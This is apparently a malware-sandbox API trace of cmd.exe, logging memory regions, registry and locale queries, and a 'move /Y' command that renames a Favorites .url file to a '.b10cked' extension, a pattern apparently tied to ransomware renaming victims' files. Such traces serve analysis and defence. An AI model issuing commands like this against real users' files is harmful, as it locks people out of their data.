Region: id = 31475 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31476 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31477 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31478 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31479 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31480 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 31481 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 31482 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 725 os_tid = 0x9dc [0213.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f884 | out: lpSystemTimeAsFileTime=0x20f884*(dwLowDateTime=0xb42df360, dwHighDateTime=0x1d440a9)) [0213.687] GetCurrentProcessId () returned 0x9d4 [0213.687] GetCurrentThreadId () returned 0x9dc [0213.687] GetTickCount () returned 0x3be10 [0213.687] QueryPerformanceCounter (in: lpPerformanceCount=0x20f87c | out: lpPerformanceCount=0x20f87c*=27047629152) returned 1 [0213.688] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.688] __set_app_type (_Type=0x1) [0213.688] __p__fmode () returned 0x76b331f4 [0213.688] __p__commode () returned 0x76b331fc [0213.688] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.688] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.688] GetCurrentThreadId () returned 0x9dc [0213.688] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9dc) returned 0x38 [0213.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.688] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.688] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.688] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.688] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f814 | out: phkResult=0x20f814*=0x0) returned 0x2 [0213.688] VirtualQuery (in: lpAddress=0x20f84b, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.688] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.689] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.689] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.689] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0213.689] GetConsoleOutputCP () returned 0x1b5 [0213.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.689] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.689] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.689] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.689] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.689] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.689] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.690] GetEnvironmentStringsW () returned 0x2301c8* [0213.690] FreeEnvironmentStringsW (penv=0x2301c8) returned 1 [0213.690] GetEnvironmentStringsW () returned 0x2301c8* [0213.690] FreeEnvironmentStringsW (penv=0x2301c8) returned 1 [0213.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e784 | out: phkResult=0x20e784*=0x40) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x0, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x0, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegCloseKey (hKey=0x40) returned 0x0 [0213.690] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e784 | out: phkResult=0x20e784*=0x40) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x0, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x9, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x9, lpcbData=0x20e788*=0x4) returned 0x0 [0213.691] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x9, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.691] RegCloseKey (hKey=0x40) returned 0x0 [0213.691] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.691] srand (_Seed=0x5b8863af) [0213.691] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"" [0213.691] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"" [0213.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.691] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.691] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.691] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.691] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.691] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.691] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.691] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.691] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.691] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.691] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.691] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.692] GetEnvironmentStringsW () returned 0x232318* [0213.692] FreeEnvironmentStringsW (penv=0x232318) returned 1 [0213.692] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.692] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.692] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.692] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.692] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.692] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.692] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.692] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.692] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.692] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f550 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.692] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f550, lpFilePart=0x20f54c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f54c*="Desktop") returned 0x18 [0213.692] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.692] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f2cc | out: lpFindFileData=0x20f2cc) returned 0x230058 [0213.692] FindClose (in: hFindFile=0x230058 | out: hFindFile=0x230058) returned 1 [0213.692] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f2cc | out: lpFindFileData=0x20f2cc) returned 0x230058 [0213.692] FindClose (in: hFindFile=0x230058 | out: hFindFile=0x230058) returned 1 [0213.693] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f2cc | out: lpFindFileData=0x20f2cc) returned 0x230058 [0213.693] FindClose (in: hFindFile=0x230058 | out: hFindFile=0x230058) returned 1 [0213.693] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.693] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.693] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.693] GetEnvironmentStringsW () returned 0x232b38* [0213.693] FreeEnvironmentStringsW (penv=0x232b38) returned 1 [0213.693] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.693] GetConsoleOutputCP () returned 0x1b5 [0213.694] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.694] GetUserDefaultLCID () returned 0x409 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f690, cchData=128 | out: lpLCData="0") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f690, cchData=128 | out: lpLCData="0") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f690, cchData=128 | out: lpLCData="1") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.694] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.695] GetConsoleTitleW (in: lpConsoleTitle=0x220910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.695] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.695] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.695] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.696] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.696] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.696] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.696] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.696] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.696] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.696] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0213.699] GetConsoleTitleW (in: lpConsoleTitle=0x20f388, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.699] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0213.699] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0213.699] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0213.699] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0213.699] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0213.699] _wcsicmp (_String1="move", _String2="CD") returned 10 [0213.699] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0213.699] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="REN") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0213.699] _wcsicmp (_String1="move", _String2="SET") returned -6 [0213.699] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0213.699] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0213.699] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0213.699] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0213.699] _wcsicmp (_String1="move", _String2="MD") returned 11 [0213.699] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0213.699] _wcsicmp (_String1="move", _String2="RD") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0213.699] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0213.699] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0213.699] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0213.700] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0213.700] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0213.700] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0213.700] _wcsicmp (_String1="move", _String2="VER") returned -9 [0213.700] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0213.700] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0213.700] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0213.700] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0213.700] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0213.700] _wcsicmp (_String1="move", _String2="START") returned -6 [0213.700] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0213.700] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0213.700] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0213.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.702] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f144, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f13c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f13c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0213.702] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0213.703] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0213.703] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0213.703] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2=".") returned 59 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2="..") returned 59 [0213.703] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\iesite~1.url")) returned 0x20 [0213.703] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x231eb0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.703] SetErrorMode (uMode=0x0) returned 0x0 [0213.703] SetErrorMode (uMode=0x1) returned 0x0 [0213.703] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", nBufferLength=0x104, lpBuffer=0x20eacc, lpFilePart=0x20eab4 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", lpFilePart=0x20eab4*="IESITE~1.URL") returned 0x2f [0213.703] SetErrorMode (uMode=0x0) returned 0x1 [0213.703] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2=".") returned 59 [0213.703] _wcsicmp (_String1="IESITE~1.URL", _String2="..") returned 59 [0213.704] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\iesite~1.url")) returned 0x20 [0213.704] SetErrorMode (uMode=0x0) returned 0x0 [0213.704] SetErrorMode (uMode=0x1) returned 0x0 [0213.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", nBufferLength=0x104, lpBuffer=0x20ef48, lpFilePart=0x20ece0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", lpFilePart=0x20ece0*="IESITE~1.URL") returned 0x2f [0213.704] SetErrorMode (uMode=0x0) returned 0x1 [0213.704] SetErrorMode (uMode=0x0) returned 0x0 [0213.704] SetErrorMode (uMode=0x1) returned 0x0 [0213.704] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f150, lpFilePart=0x20ece0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked", lpFilePart=0x20ece0*="IE site on Microsoft.com.url.b10cked") returned 0x47 [0213.704] SetErrorMode (uMode=0x0) returned 0x1 [0213.704] SetLastError (dwErrCode=0x0) [0213.704] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie site on microsoft.com.url.b10cked")) returned 0xffffffff [0213.704] GetLastError () returned 0x2 [0213.704] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL", fInfoLevelId=0x1, lpFindFileData=0x20e65c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e65c) returned 0x220f28 [0213.704] FindNextFileW (in: hFindFile=0x220f28, lpFindFileData=0x20e65c | out: lpFindFileData=0x20e65c) returned 0 [0213.705] GetLastError () returned 0x12 [0213.705] FindClose (in: hFindFile=0x220f28 | out: hFindFile=0x220f28) 